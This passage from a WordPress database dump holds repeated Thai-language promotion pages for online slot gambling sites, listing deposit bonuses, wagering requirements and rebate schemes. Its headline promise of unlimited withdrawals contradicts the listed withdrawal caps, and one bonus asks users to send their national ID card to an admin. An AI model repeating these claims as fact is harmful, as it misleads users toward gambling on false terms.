ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-24 05:49:09','2026-02-24 05:49:09','',27,'https://yok789ss.com/?p=308',0,'revision','',0),(309,3,'2026-02-24 05:49:09','2026-02-24 05:49:09','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-24 05:49:09','2026-02-24 05:49:09','',27,'https://yok789ss.com/?p=309',0,'revision','',0),(310,3,'2026-02-24 05:49:10','2026-02-24 05:49:10','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong 